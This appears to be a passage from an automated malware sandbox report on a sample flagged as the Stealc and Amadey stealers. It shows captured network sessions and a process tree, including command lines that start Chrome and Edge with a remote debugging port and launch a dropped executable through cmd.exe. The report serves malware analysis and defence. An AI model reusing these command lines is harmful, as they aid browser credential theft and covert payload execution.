xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port
142	192.168.2.5	49928	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:32 UTC	192	OUT	GET /rules/rule700200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:32 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:32 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF66E42D" x-ms-request-id: 1c14dce3-c01e-0079-04d5-33e51a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093332Z-174f7845968t42glhC1EWRa36w00000004c0000000008t4x x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:32 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
143	192.168.2.5	49929	23.44.133.12	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:32 UTC	506	OUT	GET /tenant/amp/entityid/BB18CMuA?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 09:33:32 UTC	550	IN	HTTP/1.1 200 OK Content-Type: image/jpeg Access-Control-Allow-Origin: * Content-Location: https://img.s-msn.com/tenant/amp/entityid/BB18CMuA?w=168&h=168&q=60&m=6&f=jpg&u=t Last-Modified: Sat, 02 Nov 2024 22:24:39 GMT X-Source-Length: 1437868 X-Datacenter: westus X-ActivityId: ef15eaaa-57e1-4898-82f3-733251c15fb1 Timing-Allow-Origin: * X-Frame-Options: DENY X-ResizerVersion: 1.0 Content-Length: 4096 Cache-Control: public, max-age=89509 Expires: Tue, 12 Nov 2024 10:25:21 GMT Date: Mon, 11 Nov 2024 09:33:32 GMT Connection: close
2024-11-11 09:33:32 UTC	4096	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff c0 00 11 08 00 a8 00 a8 03 01 11 00 02 11 01 03 11 01 ff c4 01 a2 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa 01 00 03 01 Data Ascii: JFIF``}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz

Session ID	Source IP	Source Port	Destination IP	Destination Port
144	192.168.2.5	49930	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:32 UTC	192	OUT	GET /rules/rule702351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:32 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:32 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE017CAD3" x-ms-request-id: 31c5e564-101e-008d-76d5-3392e5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093332Z-174f7845968jrjrxhC1EWRmmrs00000004ug000000006mg1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:32 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic

Session ID	Source IP	Source Port	Destination IP	Destination Port
145	192.168.2.5	49931	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:32 UTC	192	OUT	GET /rules/rule702350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:32 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:32 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT ETag: "0x8DC582BE6431446" x-ms-request-id: 5ac3f5ac-801e-008f-14d5-332c5d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093332Z-174f7845968cpnpfhC1EWR3afc00000004eg000000001dkv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:32 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
146	192.168.2.5	49932	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:32 UTC	192	OUT	GET /rules/rule701251v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:32 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:32 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT ETag: "0x8DC582BDE12A98D" x-ms-request-id: 3ca8c4c6-201e-0096-0fd5-33ace6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093332Z-174f7845968n2hr8hC1EWR9cag00000004dg000000003q0n x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:32 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi

Session ID	Source IP	Source Port	Destination IP	Destination Port
147	192.168.2.5	49933	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:32 UTC	192	OUT	GET /rules/rule701250v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:33 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:32 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE022ECC5" x-ms-request-id: 55c09f61-d01e-0082-16d5-33e489000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093332Z-174f7845968cdxdrhC1EWRg0en00000004qg000000004sbh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:33 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
148	192.168.2.5	49934	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:32 UTC	192	OUT	GET /rules/rule700051v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:33 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:32 GMT Content-Type: text/xml Content-Length: 1389 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE10A6BC1" x-ms-request-id: 1c14ddc0-c01e-0079-51d5-33e51a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093332Z-174f7845968cdxdrhC1EWRg0en00000004qg000000004sbm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:33 UTC	1389	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="

Session ID	Source IP	Source Port	Destination IP	Destination Port
149	192.168.2.5	49937	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:33 UTC	192	OUT	GET /rules/rule702951v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:33 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:33 GMT Content-Type: text/xml Content-Length: 1405 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE12B5C71" x-ms-request-id: 2f59fc8c-901e-002a-3cd5-337a27000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093333Z-174f7845968cdxdrhC1EWRg0en00000004r0000000003xcr x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:33 UTC	1405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke

Target ID:	0
Start time:	04:32:57
Start date:	11/11/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x750000
File size:	1'845'248 bytes
MD5 hash:	C8BDAE4B54EC9FB34BABE5908C1273F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2412394871.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2411289868.0000000000751000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2036396995.0000000005100000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:33:04
Start date:	11/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	04:33:04
Start date:	11/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=2196,i,18163450385097544274,7880029711802891747,262144 /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	04:33:13
Start date:	11/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	04:33:13
Start date:	11/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2324 --field-trial-handle=2228,i,14114506295457722425,16393737817898672495,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	04:33:13
Start date:	11/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	04:33:15
Start date:	11/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2988 --field-trial-handle=2536,i,9771309925209288626,10707726605779976435,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	04:33:21
Start date:	11/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7188 --field-trial-handle=2536,i,9771309925209288626,10707726605779976435,262144 /prefetch:8
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	04:33:21
Start date:	11/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7336 --field-trial-handle=2536,i,9771309925209288626,10707726605779976435,262144 /prefetch:8
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	04:33:31
Start date:	11/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsJDAKJDAAFB.exe"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	04:33:31
Start date:	11/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	04:33:31
Start date:	11/11/2024
Path:	C:\Users\user\DocumentsJDAKJDAAFB.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\DocumentsJDAKJDAAFB.exe"
Imagebase:	0x7e0000
File size:	3'330'048 bytes
MD5 hash:	54DBEA291C01A2BDFB4E2D6AE249EDE3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000013.00000002.2416146514.00000000007E1000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	04:33:33
Start date:	11/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0xb90000
File size:	3'330'048 bytes
MD5 hash:	54DBEA291C01A2BDFB4E2D6AE249EDE3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000014.00000002.2445335933.0000000000B91000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	04:33:33
Start date:	11/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0xb90000
File size:	3'330'048 bytes
MD5 hash:	54DBEA291C01A2BDFB4E2D6AE249EDE3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
